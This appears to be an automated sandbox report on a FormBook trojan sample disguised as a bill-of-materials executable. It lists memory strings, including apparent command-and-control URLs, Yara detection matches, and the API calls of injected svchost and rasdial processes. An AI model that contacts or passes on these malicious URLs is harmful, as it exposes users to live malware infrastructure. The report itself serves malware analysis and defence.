70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
            Source: rasdial.exe, 00000006.00000002.4653099996.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004648000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVv
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005144000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023E84000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4654251110.000000000577C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tadalaturbo.online
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4654251110.000000000577C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tadalaturbo.online/7o3y/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004000000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000003.2709631062.00000000079D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033b
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000044B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4653099996.000000000628A000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000047DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000006740000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004C90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003AED6A
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0039AA57
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003C9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: Copy of 01. Bill of Material - 705.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000000.2165916100.00000000003F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f88ec9d2-1
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000000.2165916100.00000000003F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d5e381bf-1
            Source: Copy of 01. Bill of Material - 705.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_703b15ea-a
            Source: Copy of 01. Bill of Material - 705.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_742abbec-9
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Copy of 01. Bill of Material - 705.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C1A3 NtClose,2_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A4650 NtSuspendThread,LdrInitializeThunk,6_2_047A4650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A4340 NtSetContextThread,LdrInitializeThunk,6_2_047A4340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047A2C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2C60 NtCreateKey,LdrInitializeThunk,6_2_047A2C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047A2CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047A2D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047A2D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047A2DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047A2DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047A2EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047A2E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2F30 NtCreateSection,LdrInitializeThunk,6_2_047A2F30
